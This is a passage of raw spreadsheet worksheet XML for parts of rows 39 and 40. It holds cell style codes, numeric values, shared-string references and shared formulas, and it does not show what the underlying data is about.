      <c r="FT39" s="112">
        <v>16.0</v>
      </c>
      <c r="FU39" s="112">
        <v>32.0</v>
      </c>
      <c r="FV39" s="112">
        <v>0.0</v>
      </c>
      <c r="FW39" s="112">
        <v>48.0</v>
      </c>
      <c r="FX39" s="112">
        <v>48.0</v>
      </c>
      <c r="FY39" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ39" s="112">
        <v>0.0</v>
      </c>
      <c r="GA39" s="112">
        <v>0.0</v>
      </c>
      <c r="GB39" s="112">
        <v>0.0</v>
      </c>
      <c r="GC39" s="112">
        <v>0.0</v>
      </c>
      <c r="GD39" s="112">
        <v>0.0</v>
      </c>
      <c r="GE39" s="112">
        <v>0.0</v>
      </c>
      <c r="GF39" s="112">
        <v>0.0</v>
      </c>
      <c r="GG39" s="112">
        <v>0.0</v>
      </c>
      <c r="GH39" s="113">
        <f t="shared" si="39"/>
        <v>16</v>
      </c>
      <c r="GI39" s="113">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="GJ39" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK39" s="113">
        <f t="shared" si="42"/>
        <v>32</v>
      </c>
      <c r="GL39" s="113">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="GM39" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN39" s="113">
        <f t="shared" si="45"/>
        <v>48</v>
      </c>
      <c r="GO39" s="113">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="GP39" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ39" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR39" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS39" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT39" s="94"/>
      <c r="GU39" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV39" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW39" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX39" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY39" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ39" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA39" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB39" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC39" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD39" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE39" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF39" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG39" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH39" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI39" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ39" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK39" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL39" s="93">
        <v>27710.0</v>
      </c>
      <c r="HM39" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN39" s="93">
        <v>0.0</v>
      </c>
      <c r="HO39" s="93">
        <v>0.0</v>
      </c>
      <c r="HP39" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ39" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR39" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS39" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT39" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU39" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV39" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW39" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX39" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY39" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ39" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA39" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB39" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC39" s="120" t="str">
        <f t="shared" si="88"/>
        <v>-</v>
      </c>
      <c r="ID39" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE39" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF39" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG39" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH39" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II39" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ39" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK39" s="99">
        <v>14116.0</v>
      </c>
      <c r="IL39" s="99">
        <v>0.0</v>
      </c>
      <c r="IM39" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN39" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO39" s="98">
        <v>0.0</v>
      </c>
      <c r="IP39" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ39" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR39" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS39" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT39" s="127"/>
      <c r="IU39" s="127"/>
      <c r="IV39" s="127"/>
      <c r="IW39" s="127"/>
      <c r="IX39" s="127"/>
      <c r="IY39" s="127"/>
      <c r="IZ39" s="127"/>
      <c r="JA39" s="127"/>
      <c r="JB39" s="127"/>
      <c r="JC39" s="127"/>
      <c r="JD39" s="127"/>
      <c r="JE39" s="127"/>
      <c r="JF39" s="127"/>
      <c r="JG39" s="127"/>
      <c r="JH39" s="127"/>
      <c r="JI39" s="127"/>
      <c r="JJ39" s="127"/>
      <c r="JK39" s="127"/>
      <c r="JL39" s="127"/>
      <c r="JM39" s="127"/>
      <c r="JN39" s="127"/>
      <c r="JO39" s="127"/>
      <c r="JP39" s="127"/>
      <c r="JQ39" s="127"/>
      <c r="JR39" s="127"/>
      <c r="JS39" s="127"/>
      <c r="JT39" s="127"/>
      <c r="JU39" s="127"/>
      <c r="JV39" s="127"/>
      <c r="JW39" s="127"/>
      <c r="JX39" s="127"/>
      <c r="JY39" s="127"/>
      <c r="JZ39" s="127"/>
      <c r="KA39" s="127"/>
      <c r="KB39" s="127"/>
      <c r="KC39" s="127"/>
      <c r="KD39" s="127"/>
      <c r="KE39" s="127"/>
      <c r="KF39" s="127"/>
      <c r="KG39" s="127"/>
      <c r="KH39" s="127"/>
      <c r="KI39" s="127"/>
      <c r="KJ39" s="127"/>
      <c r="KK39" s="127"/>
      <c r="KL39" s="127"/>
      <c r="KM39" s="127"/>
      <c r="KN39" s="127"/>
      <c r="KO39" s="127"/>
      <c r="KP39" s="127"/>
      <c r="KQ39" s="127"/>
      <c r="KR39" s="127"/>
      <c r="KS39" s="127"/>
      <c r="KT39" s="127"/>
      <c r="KU39" s="127"/>
      <c r="KV39" s="127"/>
      <c r="KW39" s="127"/>
      <c r="KX39" s="127"/>
      <c r="KY39" s="127"/>
      <c r="KZ39" s="127"/>
      <c r="LA39" s="127"/>
      <c r="LB39" s="127"/>
      <c r="LC39" s="127"/>
      <c r="LD39" s="127"/>
      <c r="LE39" s="127"/>
      <c r="LF39" s="127"/>
      <c r="LG39" s="127"/>
      <c r="LH39" s="127"/>
      <c r="LI39" s="127"/>
      <c r="LJ39" s="127"/>
      <c r="LK39" s="127"/>
      <c r="LL39" s="127"/>
      <c r="LM39" s="127"/>
      <c r="LN39" s="127"/>
      <c r="LO39" s="127"/>
      <c r="LP39" s="127"/>
      <c r="LQ39" s="127"/>
      <c r="LR39" s="127"/>
      <c r="LS39" s="127"/>
      <c r="LT39" s="127"/>
      <c r="LU39" s="127"/>
      <c r="LV39" s="127"/>
      <c r="LW39" s="127"/>
      <c r="LX39" s="127"/>
      <c r="LY39" s="127"/>
      <c r="LZ39" s="127"/>
      <c r="MA39" s="127"/>
      <c r="MB39" s="127"/>
      <c r="MC39" s="127"/>
      <c r="MD39" s="127"/>
      <c r="ME39" s="127"/>
      <c r="MF39" s="127"/>
      <c r="MG39" s="127"/>
      <c r="MH39" s="127"/>
      <c r="MI39" s="127"/>
      <c r="MJ39" s="127"/>
      <c r="MK39" s="127"/>
      <c r="ML39" s="127"/>
      <c r="MM39" s="127"/>
      <c r="MN39" s="127"/>
      <c r="MO39" s="127"/>
      <c r="MP39" s="127"/>
      <c r="MQ39" s="127"/>
      <c r="MR39" s="127"/>
      <c r="MS39" s="127"/>
      <c r="MT39" s="127"/>
      <c r="MU39" s="127"/>
      <c r="MV39" s="127"/>
      <c r="MW39" s="127"/>
      <c r="MX39" s="127"/>
      <c r="MY39" s="127"/>
      <c r="MZ39" s="127"/>
      <c r="NA39" s="127"/>
      <c r="NB39" s="127"/>
      <c r="NC39" s="127"/>
      <c r="ND39" s="127"/>
      <c r="NE39" s="127"/>
      <c r="NF39" s="127"/>
      <c r="NG39" s="127"/>
      <c r="NH39" s="127"/>
      <c r="NI39" s="127"/>
      <c r="NJ39" s="127"/>
      <c r="NK39" s="127"/>
      <c r="NL39" s="127"/>
      <c r="NM39" s="127"/>
      <c r="NN39" s="127"/>
      <c r="NO39" s="127"/>
      <c r="NP39" s="127"/>
      <c r="NQ39" s="127"/>
      <c r="NR39" s="127"/>
      <c r="NS39" s="127"/>
      <c r="NT39" s="127"/>
      <c r="NU39" s="127"/>
      <c r="NV39" s="127"/>
      <c r="NW39" s="127"/>
      <c r="NX39" s="127"/>
      <c r="NY39" s="127"/>
    </row>
    <row r="40" ht="153.75" customHeight="1">
      <c r="B40" s="89" t="s">
        <v>244</v>
      </c>
      <c r="C40" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D40" s="90" t="s">
        <v>245</v>
      </c>
      <c r="E40" s="90" t="s">
        <v>822</v>
      </c>
      <c r="F40" s="90" t="s">
        <v>823</v>
      </c>
      <c r="G40" s="90" t="s">
        <v>850</v>
      </c>
      <c r="H40" s="90" t="s">
        <v>851</v>
      </c>
      <c r="I40" s="92" t="s">
        <v>859</v>
      </c>
      <c r="J40" s="92" t="s">
        <v>865</v>
      </c>
      <c r="K40" s="92" t="s">
        <v>866</v>
      </c>
      <c r="L40" s="93" t="s">
        <v>218</v>
      </c>
      <c r="M40" s="93">
        <v>1.0</v>
      </c>
      <c r="N40" s="93">
        <v>1.0</v>
      </c>
      <c r="O40" s="93">
        <v>0.0</v>
      </c>
      <c r="P40" s="93">
        <v>1.0</v>
      </c>
      <c r="Q40" s="93">
        <f t="shared" si="70"/>
        <v>1</v>
      </c>
      <c r="R40" s="93">
        <v>1.0</v>
      </c>
      <c r="S40" s="93">
        <v>0.0</v>
      </c>
      <c r="T40" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U40" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V40" s="126" t="s">
        <v>867</v>
      </c>
      <c r="W40" s="96" t="s">
        <v>868</v>
      </c>
      <c r="X40" s="97" t="s">
        <v>869</v>
      </c>
      <c r="Y40" s="96" t="s">
        <v>870</v>
      </c>
      <c r="Z40" s="96" t="s">
        <v>871</v>
      </c>
      <c r="AA40" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB40" s="98" t="s">
        <v>224</v>
      </c>
      <c r="AC40" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD40" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE40" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF40" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG40" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH40" s="99" t="s">
        <v>872</v>
      </c>
      <c r="AI40" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ40" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK40" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL40" s="100">
        <v>0.0</v>
      </c>
      <c r="AM40" s="100">
        <v>0.0</v>
      </c>
      <c r="AN40" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO40" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP40" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ40" s="100">
        <v>0.0</v>
      </c>
      <c r="AR40" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS40" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT40" s="100" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="AU40" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV40" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW40" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX40" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY40" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ40" s="100">
        <v>0.0</v>
      </c>
      <c r="BA40" s="102">
        <v>3.0</v>
      </c>
      <c r="BB40" s="102">
        <v>0.0</v>
      </c>
      <c r="BC40" s="102">
        <v>0.0</v>
      </c>
      <c r="BD40" s="102">
        <v>0.0</v>
      </c>
      <c r="BE40" s="102">
        <v>0.0</v>
      </c>
      <c r="BF40" s="102">
        <v>0.0</v>
      </c>
      <c r="BG40" s="102">
        <v>0.0</v>
      </c>
      <c r="BH40" s="102">
        <v>0.0</v>
      </c>
      <c r="BI40" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ40" s="102">
        <v>0.0</v>
      </c>
      <c r="BK40" s="102">
        <v>0.0</v>
      </c>
      <c r="BL40" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM40" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN40" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO40" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP40" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ40" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR40" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS40" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT40" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU40" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV40" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW40" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX40" s="104">
        <v>0.0</v>
      </c>
      <c r="BY40" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ40" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA40" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB40" s="104">
        <v>0.0</v>
      </c>
      <c r="CC40" s="104">
        <v>0.0</v>
      </c>
      <c r="CD40" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE40" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF40" s="104" t="str">
        <f t="shared" si="90"/>
        <v>-</v>
      </c>
      <c r="CG40" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH40" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI40" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ40" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK40" s="104">
        <v>0.0</v>
      </c>
      <c r="CL40" s="104">
        <v>0.0</v>
      </c>
      <c r="CM40" s="105">
        <v>3.0</v>
      </c>
      <c r="CN40" s="105">
        <v>0.0</v>
      </c>
      <c r="CO40" s="105">
        <v>0.0</v>
      </c>
      <c r="CP40" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ40" s="105">
        <v>0.0</v>
      </c>
      <c r="CR40" s="105">
        <v>0.0</v>
      </c>
      <c r="CS40" s="105">
        <v>0.0</v>
      </c>
      <c r="CT40" s="105">
        <v>0.0</v>
      </c>
      <c r="CU40" s="105">
        <v>0.0</v>
      </c>
      <c r="CV40" s="105">
        <v>0.0</v>
      </c>
      <c r="CW40" s="105">
        <v>0.0</v>
      </c>
      <c r="CX40" s="105">
        <v>0.0</v>
      </c>
      <c r="CY40" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ40" s="105">
        <v>0.0</v>
      </c>
      <c r="DA40" s="105">
        <v>0.0</v>
      </c>
      <c r="DB40" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC40" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD40" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE40" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF40" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG40" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH40" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI40" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ40" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK40" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL40" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM40" s="108">
        <v>19559.0</v>
      </c>
      <c r="DN40" s="108">
        <v>1.0</v>
      </c>
      <c r="DO40" s="108">
        <v>1.0</v>
      </c>
      <c r="DP40" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ40" s="108">
        <v>19559.0</v>
      </c>
      <c r="DR40" s="108">
        <v>1.0</v>
      </c>
      <c r="DS40" s="108">
        <v>1.0</v>
      </c>
      <c r="DT40" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU40" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV40" s="108" t="str">
        <f t="shared" si="91"/>
        <v>-</v>
      </c>
      <c r="DW40" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX40" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY40" s="108">
        <v>19559.0</v>
      </c>
      <c r="DZ40" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA40" s="108">
        <v>1.0</v>
      </c>
      <c r="EB40" s="108">
        <v>1.0</v>
      </c>
      <c r="EC40" s="109">
        <v>3.0</v>
      </c>
      <c r="ED40" s="109">
        <v>0.0</v>
      </c>
      <c r="EE40" s="109">
        <v>1.0</v>
      </c>
      <c r="EF40" s="109">
        <v>1.0</v>
      </c>
      <c r="EG40" s="109">
        <v>0.0</v>
      </c>
      <c r="EH40" s="109">
        <v>1.0</v>
      </c>
      <c r="EI40" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ40" s="109">
        <v>0.0</v>
      </c>
      <c r="EK40" s="109">
        <v>1.0</v>
      </c>
      <c r="EL40" s="109">
        <v>1.0</v>
      </c>
      <c r="EM40" s="109">
        <v>0.0</v>
      </c>
      <c r="EN40" s="109">
        <v>1.0</v>
      </c>
      <c r="EO40" s="109">
        <v>1.0</v>
      </c>
      <c r="EP40" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ40" s="109">
        <v>1.0</v>
      </c>
      <c r="ER40" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES40" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET40" s="110">
        <f t="shared" si="29"/>
        <v>1</v>
      </c>
      <c r="EU40" s="110">
        <f t="shared" si="30"/>
        <v>1</v>
      </c>
      <c r="EV40" s="110">
        <f t="shared" si="31"/>
        <v>1</v>
      </c>
      <c r="EW40" s="110">
        <f t="shared" si="32"/>
        <v>1</v>
      </c>
      <c r="EX40" s="110">
        <f t="shared" si="33"/>
        <v>1</v>
      </c>
      <c r="EY40" s="110">
        <f t="shared" si="34"/>
        <v>1</v>
      </c>
      <c r="EZ40" s="110">
        <f t="shared" si="35"/>
        <v>1</v>
      </c>
      <c r="FA40" s="110">
        <f t="shared" si="79"/>
        <v>1</v>
      </c>
      <c r="FB40" s="110">
        <f t="shared" si="80"/>
        <v>1</v>
      </c>
      <c r="FC40" s="111" t="s">
        <v>873</v>
      </c>
      <c r="FD40" s="111">
        <v>3.0</v>
      </c>
      <c r="FE40" s="111">
        <v>2.0</v>
      </c>
      <c r="FF40" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG40" s="111">
        <v>19559.0</v>
      </c>
      <c r="FH40" s="111">
        <v>1.0</v>
      </c>
      <c r="FI40" s="111">
        <v>1.0</v>
      </c>
      <c r="FJ40" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK40" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL40" s="111" t="str">
        <f t="shared" si="69"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM40" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN40" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO40" s="111">
        <v>19559.0</v>
      </c>
      <c r="FP40" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ40" s="111">
        <v>1.0</v>
      </c>
      <c r="FR40" s="111">
        <v>1.0</v>
      </c>
      <c r="FS40" s="112">
        <v>3.0</v>
      </c>
      <c r="FT40" s="112">
        <v>1.0</v>
      </c>
      <c r="FU40" s="112">
        <v>3.0</v>
      </c>
      <c r="FV40" s="112">
        <v>1.0</v>
      </c>
      <c r="FW40" s="112">
        <v>4.0</v>
      </c>
      <c r="FX40" s="112">
        <v>5.0</v>
      </c>
      <c r="FY40" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ40" s="112">
        <v>0.0</v>
      </c>
      <c r="GA40" s="112">
        <v>1.0</v>
      </c>
      <c r="GB40" s="112">
        <v>1.0</v>
      </c>
      <c r="GC40" s="112">
        <v>0.0</v>
      </c>
      <c r="GD40" s="112">
        <v>1.0</v>
      </c>
      <c r="GE40" s="112">
        <v>1.0</v>
      </c>
      <c r="GF40" s="112">
        <v>0.0</v>
      </c>
      <c r="GG40" s="112">
        <v>1.0</v>
      </c>
      <c r="GH40" s="113">
        <f t="shared" si="39"/>
        <v>1</v>
      </c>
      <c r="GI40" s="113">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="GJ40" s="113">
        <f t="shared" si="41"/>
        <v>1</v>
      </c>
      <c r="GK40" s="113">
        <f t="shared" si="42"/>
        <v>3</v>
      </c>
      <c r="GL40" s="113">
        <f t="shared" si="43"/>
        <v>1</v>
      </c>
      <c r="GM40" s="113">
        <f t="shared" si="44"/>
        <v>1</v>
      </c>
      <c r="GN40" s="113">
        <f t="shared" si="45"/>
        <v>5</v>
      </c>
      <c r="GO40" s="113">
        <f t="shared" si="46"/>
        <v>1</v>
      </c>
      <c r="GP40" s="113">
        <f t="shared" si="47"/>
        <v>1</v>
      </c>
      <c r="GQ40" s="114">
        <f t="shared" si="81"/>
        <v>1</v>
      </c>
      <c r="GR40" s="113">
        <f t="shared" si="82"/>
        <v>1</v>
      </c>
      <c r="GS40" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT40" s="94" t="s">
        <v>874</v>
      </c>
      <c r="GU40" s="116">
        <v>35662.0</v>
      </c>
      <c r="GV40" s="116">
        <v>1.0</v>
      </c>
      <c r="GW40" s="116">
        <v>1.0</v>
      </c>
      <c r="GX40" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY40" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ40" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA40" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB40" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC40" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD40" s="131">
        <v>35662.0</v>
      </c>
      <c r="HE40" s="131">
        <v>35662.0</v>
      </c>
      <c r="HF40" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG40" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH40" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI40" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ40" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK40" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL40" s="93">
        <v>3.0</v>
      </c>
      <c r="HM40" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN40" s="93">
        <v>1.0</v>
      </c>
      <c r="HO40" s="93">
        <v>0.0</v>
      </c>
      <c r="HP40" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ40" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR40" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS40" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT40" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU40" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV40" s="119" t="s">
        <v>875</v>
      </c>
      <c r="HW40" s="119">
        <v>2.0</v>
      </c>
      <c r="HX40" s="119">
        <v>6.0</v>
      </c>
      <c r="HY40" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ40" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA40" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB40" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC40" s="120" t="str">
        <f t="shared" si="88"/>
        <v>31914, 94174</v>
      </c>
      <c r="ID40" s="120" t="s">
        <v>875</v>
      </c>
      <c r="IE40" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF40" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG40" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH40" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II40" s="99" t="s">
        <v>876</v>
      </c>
      <c r="IJ40" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK40" s="99">
        <v>3.0</v>
      </c>
      <c r="IL40" s="99">
        <v>1.0</v>
      </c>
      <c r="IM40" s="121">
        <f t="shared" si="57"/>
        <v>1</v>
      </c>
      <c r="IN40" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO40" s="98">
        <v>1.0</v>
      </c>
      <c r="IP40" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ40" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR40" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS40" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT40" s="127"/>
      <c r="IU40" s="127"/>
      <c r="IV40" s="127"/>
      <c r="IW40" s="127"/>
      <c r="IX40" s="127"/>
      <c r="IY40" s="127"/>
      <c r="IZ40" s="127"/>
      <c r="JA40" s="127"/>
      <c r="JB40" s="127"/>
      <c r="JC40" s="127"/>
      <c r="JD40" s="127"/>
      <c r="JE40" s="127"/>
      <c r="JF40" s="127"/>
      <c r="JG40" s="127"/>
      <c r="JH40" s="127"/>
      <c r="JI40" s="127"/>
      <c r="JJ40" s="127"/>
      <c r="JK40" s="127"/>
      <c r="JL40" s="127"/>
      <c r="JM40" s="127"/>
      <c r="JN40" s="127"/>
      <c r="JO40" s="127"/>
      <c r="JP40" s="127"/>
      <c r="JQ40" s="127"/>
      <c r="JR40" s="127"/>
      <c r="JS40" s="127"/>
      <c r="JT40" s="127"/>
      <c r="JU40" s="127"/>
      <c r="JV40" s="127"/>
      <c r="JW40" s="127"/>
      <c r="JX40" s="127"/>
      <c r="JY40" s="127"/>
      <c r="JZ40" s="127"/>
      <c r="KA40" s="127"/>
      <c r="KB40" s="127"/>
      <c r="KC40" s="127"/>
      <c r="KD40" s="127"/>
      <c r="KE40" s="127"/>
      <c r="KF40" s="127"/>
      <c r="KG40" s="127"/>
      <c r="KH40" s="127"/>
      <c r="KI40" s="127"/>
      <c r="KJ40" s="127"/>
      <c r="KK40" s="127"/>
      <c r="KL40" s="127"/>
      <c r="KM40" s="127"/>
      <c r="KN40" s="127"/>
      <c r="KO40" s="127"/>
      <c r="KP40" s="127"/>
      <c r="KQ40" s="127"/>
      <c r="KR40" s="127"/>
      <c r="KS40" s="127"/>
      <c r="KT40" s="127"/>
      <c r="KU40" s="127"/>
      <c r="KV40" s="127"/>
      <c r="KW40" s="127"/>
      <c r="KX40" s="127"/>
      <c r="KY40" s="127"/>
      <c r="KZ40" s="127"/>
      <c r="LA40" s="127"/>
      <c r="LB40" s="127"/>
      <c r="LC40" s="127"/>
      <c r="LD40" s="127"/>
      <c r="LE40" s="127"/>
      <c r="LF40" s="127"/>
      <c r="LG40" s="127"/>
      <c r="LH40" s="127"/>
      <c r="LI40" s="127"/>
      <c r="LJ40" s="127"/>
      <c r="LK40" s="127"/>
      <c r="LL40" s="127"/>
      <c r="LM40" s="127"/>
      <c r="LN40" s="127"/>
      <c r="LO40" s="127"/>
      <c r="LP40" s="127"/>
      <c r="LQ40" s="127"/>
      <c r="LR40" s="127"/>
      <c r="LS40" s="127"/>
      <c r="LT40" s="127"/>
      <c r="LU40" s="127"/>
      <c r="LV40" s="127"/>
      <c r="LW40" s="127"/>
      <c r="LX40" s="127"/>
      <c r="LY40" s="127"/>
      <c r="LZ40" s="127"/>
      <c r="MA40" s="127"/>
      <c r="MB40" s="127"/>
      <c r="MC40" s="127"/>
      <c r="MD40" s="127"/>
      <c r="ME40" s="127"/>
      <c r="MF40" s="127"/>
